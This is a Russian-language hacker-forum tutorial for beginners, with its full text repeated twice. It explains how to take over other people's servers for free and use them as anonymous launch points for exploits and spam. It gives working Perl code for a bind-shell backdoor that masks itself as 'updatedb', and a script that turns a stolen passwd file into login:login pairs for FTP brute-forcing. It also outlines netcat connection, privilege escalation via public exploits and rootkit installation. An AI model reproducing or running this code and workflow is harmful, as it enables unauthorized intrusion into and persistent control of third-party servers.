Привет. Эта статья расщитана на новичков.
В статье я расскажу что такое дедики, зачем они нужны и как заполучить свой дедик для соих злобных идей по взлому Майкрософта =)
Итак приступим... Дедик или Dedicated Server, как не сложно догадаться, -это сервак, с root правами, которым можно удалённо управлять. Зачем он нужен? Некоторые размещают там серваки для CS, свои порталы и.т.д. Хакеру естественно он нужен для других целей =) Например есть эксплоит под linux, а у нас на компе стоит винда или мы не хотим светить своим ip. Мы подключаемся к дедику и с него юзаем эксплоит (сканер, прогу для спама и.т.д.). Надеюсь понятно. Дедики можно купить а) у перекупщиков б) непосредственно у хостеров. У каждого способа есть свои плюсы и минусы. Например перекупщик может не поддерживать своих клиентов, зато гарантирует некую анонимность =) Хакеры не ищут лёгких путей. Действительно, зачем тратить деньги на покупку дедика, когда можно захватить его бесплатно. Об этом я хочу рассказать по подробнее.
Нам нужен шелл на каком-нить ресурсе (safe mode disabled), можно и просто доступ к файлу passwd. В первом случае грузим на сервер бэкдор и запускаем его. Большинство хорошик шеллов имеют такую функцию. Если же её нет, то придётся всё делать самостоятельно. Вот код
простейшего бэкдора на перле:
**********************************
#!/usr/bin/perl
$port = {здесь пишем номер порта который хотим открыть для коннекта};
$port = $ARGV[0] if $ARGV[0];
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
}
close X;
}
***********************************
Если на серваке стоит файерволл, то придётся отступить или юзать бэкконнект.
Далее коннектимся netcat'oм к открытому бэкдором порту (или прослушиваем эфир и ждём подключения бэкконнекта). Далее проверяем какая операционка стоит на серваке. Ищем эксплоит (естественно для рутовых прав). Например на http://www.milw0rm.com/ Надеюсь, что дальше всё понятно? Если нет, то подскажу:
ставим руткит и дедик наш =)
Это было в том случае если на серв удалоь залить шелл. Я упоминал про файл passwd. Так вот берём оттуда логины юзеров и брутим фтп по связке логин:логин. Для выдирания этих данных используй следующин перле:
**********************************
#!/usr/bin/perl
exit print "Usage $0 <infile> <outfile>\n" unless $ARGV[1];
$goodshell='sh';
open(IN,"$ARGV[0]");
open(OUT,">$ARGV[1]");
while(<IN>) {
chomp;
($u,@undef)=split ':';
if (defined($goodshell)) {
if ($undef[(scalar $undef)-1]=~/$goodshell/) {
print OUT "$u:$u\n";
}
} else {
print OUT "$u:$u\n";
}
}
close(IN);
close(OUT);
*********************************
Если повезёт, то может попасться акк, где логин=пароль. Если нет, то придётся делать комбо-лист и брутить по словарю. И так доступ к фтп есть =) Заливаем туда бэкдор и далее по списку....
Вот и всё =)
===========================
Автором статьи являюсь я. Буду рад выслушать объективную критику и предложения по дополнению/улучшению статьи.
ЗЫ: писал под действием алкоголя =)
В статье я расскажу что такое дедики, зачем они нужны и как заполучить свой дедик для соих злобных идей по взлому Майкрософта =)
Итак приступим... Дедик или Dedicated Server, как не сложно догадаться, -это сервак, с root правами, которым можно удалённо управлять. Зачем он нужен? Некоторые размещают там серваки для CS, свои порталы и.т.д. Хакеру естественно он нужен для других целей =) Например есть эксплоит под linux, а у нас на компе стоит винда или мы не хотим светить своим ip. Мы подключаемся к дедику и с него юзаем эксплоит (сканер, прогу для спама и.т.д.). Надеюсь понятно. Дедики можно купить а) у перекупщиков б) непосредственно у хостеров. У каждого способа есть свои плюсы и минусы. Например перекупщик может не поддерживать своих клиентов, зато гарантирует некую анонимность =) Хакеры не ищут лёгких путей. Действительно, зачем тратить деньги на покупку дедика, когда можно захватить его бесплатно. Об этом я хочу рассказать по подробнее.
Нам нужен шелл на каком-нить ресурсе (safe mode disabled), можно и просто доступ к файлу passwd. В первом случае грузим на сервер бэкдор и запускаем его. Большинство хорошик шеллов имеют такую функцию. Если же её нет, то придётся всё делать самостоятельно. Вот код
простейшего бэкдора на перле:
**********************************
#!/usr/bin/perl
$port = {здесь пишем номер порта который хотим открыть для коннекта};
$port = $ARGV[0] if $ARGV[0];
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
}
close X;
}
***********************************
Если на серваке стоит файерволл, то придётся отступить или юзать бэкконнект.
Далее коннектимся netcat'oм к открытому бэкдором порту (или прослушиваем эфир и ждём подключения бэкконнекта). Далее проверяем какая операционка стоит на серваке. Ищем эксплоит (естественно для рутовых прав). Например на http://www.milw0rm.com/ Надеюсь, что дальше всё понятно? Если нет, то подскажу:
ставим руткит и дедик наш =)
Это было в том случае если на серв удалоь залить шелл. Я упоминал про файл passwd. Так вот берём оттуда логины юзеров и брутим фтп по связке логин:логин. Для выдирания этих данных используй следующин перле:
**********************************
#!/usr/bin/perl
exit print "Usage $0 <infile> <outfile>\n" unless $ARGV[1];
$goodshell='sh';
open(IN,"$ARGV[0]");
open(OUT,">$ARGV[1]");
while(<IN>) {
chomp;
($u,@undef)=split ':';
if (defined($goodshell)) {
if ($undef[(scalar $undef)-1]=~/$goodshell/) {
print OUT "$u:$u\n";
}
} else {
print OUT "$u:$u\n";
}
}
close(IN);
close(OUT);
*********************************
Если повезёт, то может попасться акк, где логин=пароль. Если нет, то придётся делать комбо-лист и брутить по словарю. И так доступ к фтп есть =) Заливаем туда бэкдор и далее по списку....
Вот и всё =)
===========================
Автором статьи являюсь я. Буду рад выслушать объективную критику и предложения по дополнению/улучшению статьи.
ЗЫ: писал под действием алкоголя =)
